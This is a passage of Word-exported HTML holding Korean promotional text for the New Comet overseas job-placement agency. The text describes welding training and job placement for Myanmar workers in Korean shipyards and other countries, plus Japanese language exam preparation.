Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">작업을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">하는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">동안</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\"> 200</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">명</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">이상의</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">직원에게</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">고용</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">기회를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">제공했습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">저희&nbsp;</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">\"</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\"><strong>뉴코멧</strong></span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\"><strong>해외직업소개회사</strong></span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">\"</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">는 현재에</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">한국</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">조선소들에 일하고 싶은 미얀마</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">각지에서</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">온</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">소수민족</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">형제들을 교통통신부</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">산하</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">씬마락</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"> (Sinmalike)</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">조선소에 트레이너들와 함께 훌령한 기능공이</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">되도록</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">용접수업을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">제공하고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">있으며</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">취업할 수 있게 취업들을 연계시키고 도와주고 있습니다</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">.</span></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">또한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">두바이</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">말레이시아</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">싱가포</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">태국</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">, </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">일본 같은</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">국가에서</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">일하기를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">원하는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">청년들에게</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">취업</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">기회를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">받알 수 있도록&nbsp;</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-spacerun:yes;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">서비스들을 제공하고 있습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span></p><p class=\"MsoNormal\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">New Comet Trading Agency Co.ltd</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">미얀마의</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">젊은</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">치누들이 일본의</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">개발한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">첨단</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">기술을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">배우고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">꿈을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">실현할</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">수</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">있도록</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">필요한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">교육을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">제공하고 돕고 있습니다</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">.</span></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">일본으로 취업비자</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">연수비자로 가기</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">위해</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">필요한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">자격시험</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">(JLPT, JFT, NAT-TEST, TOP-J)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">에</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">합격할</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">수</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">있도록</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">어학당도</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">개설</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">및 교육을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">지원하고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">있습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">저희는</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">”</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\"><strong>뉴코멧</strong></span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\"><strong>해외직업소개회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"><strong>”&nbsp;</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-bidi-font-weight:bold;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">미얀마에서</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">우수한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">기능인력을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">배출하여</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">해외로</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">파견하는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" 